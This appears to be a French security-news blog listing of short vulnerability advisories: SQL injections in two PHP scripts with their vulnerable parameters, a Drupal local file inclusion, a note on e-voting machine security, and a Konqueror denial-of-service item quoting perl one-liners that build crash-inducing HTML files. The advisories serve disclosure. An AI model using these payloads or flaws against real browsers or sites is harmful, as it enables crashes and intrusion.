SQL Injection dans Mole Group Vacation
Une faille de type SQL injection a été découverte par “x0r” dans Mole Group Vacation au niveau du script “properties_view.php” qui ne filtre pas suffisamment la variable “editid1″ avant d’en intégrer le contenu à une requête SQL. Cette vulnérabilité pourrait permettre à un utilisateur malveillant de faire exécuter des requêtes arbitraires sur le serveur cible. [...]
Deltascripts PHP classifields <= 7.5
Une sql injection a été découverte dans le script Deltascripts PHP classifields <= 7.5 . Le problème se situe au niveau de la variable siteid qui n’est pas suffisamment assainie avant d’être intégrée à la requête SQL, ce qui pourrait permettre à un utilisateur malveillant de faire exécuter des requêtes arbitraires sur le serveur cible. [...]
Machines à voter électroniques
Cédric « Sid » Blancher a publié aujourd’hui un billet très intéressant remettant en cause la sécurité des machines à voter électroniques. Plusieurs pays ont déjà utilisés ce type de machines afin de mener différents votes. En France, le premier vote électronique a eu lieu en 2004, lors des élections cantonales de Brest. La question [...]
Inclusion locale dans Drupal
Une vulnérabilité de type inclusion locale a été découverte dans Drupal par Anthony Ferrara. Le problème se situe au niveau du fichier “bootstrap.inc” qui ne filtre pas correctement les données envoyées par l’utilisateur. Cette faille pourrait permettre à un utilisateur malveillant d’avoir accès à des données sensibles du système cible.
Konqueror, DOS a gogo
De nombreuses possibilités de DOS ont été découvertes par Jeremy Brown dans Konqueror. Il nous propose les exemples suivants: perl -e ‘print “<html>\n” . “<font color=” . “A” x 500000 . “>\n</html>”‘ > kdie.html perl -e ‘print “<html>\n” . “<hr color=” . “A” x 500000 . “>\n</html>”‘ > kdie2.html perl -e ‘print “<html>\n” . “<table [...]